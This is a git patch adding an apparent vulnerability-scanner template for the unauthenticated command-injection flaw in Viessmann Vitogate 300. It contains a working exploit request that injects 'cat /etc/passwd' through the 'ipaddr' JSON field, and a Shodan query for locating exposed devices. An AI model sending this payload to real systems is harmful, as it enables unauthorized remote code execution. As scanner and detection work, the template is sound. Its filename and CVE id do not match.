From 1f0c821f5db19148da93ed236a7cf1004fd7744c Mon Sep 17 00:00:00 2001 From: Rahul Maini Date: Fri, 20 Oct 2023 17:47:42 +0400 Subject: [PATCH] Added CVE-2023-4582 Vitogate 300 RCE --- http/cves/2023/CVE-2023-4582.yaml | 51 +++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 http/cves/2023/CVE-2023-4582.yaml diff --git a/http/cves/2023/CVE-2023-4582.yaml b/http/cves/2023/CVE-2023-4582.yaml new file mode 100644 index 0000000000..bba0c7394f --- /dev/null +++ b/http/cves/2023/CVE-2023-4582.yaml @@ -0,0 +1,51 @@ +id: CVE-2023-45852 +info: + name: Viessmann Vitogate 300 - Unauthenticated Remote Code Execution + author: iamnoooob, rootxharsh, pdresearch + severity: critical + description: | + In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method. + reference: + - https://connectivity.viessmann.com/gb/mp-fp/vitogate/vitogate-300-bn-mb.html + - https://github.com/Push3AX/vul/blob/main/viessmann/Vitogate300_RCE.md + tags: rce,vitogate + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-45852 + cwe-id: CWE-77 + cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: Viessmann + shodan-query: title="Vitogate 300" + +variables: + marker: "{{randstr}}" + +http: + - raw: + - | + POST /cgi-bin/vitogate.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"{{marker}};cat /etc/passwd"}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'traceroute: {{marker}}: Unknown host' + - 'daemon:x:1:1:' + + - type: word + part: header + words: + - 'Content-Type: application/json' + + - type: status + status: + - 200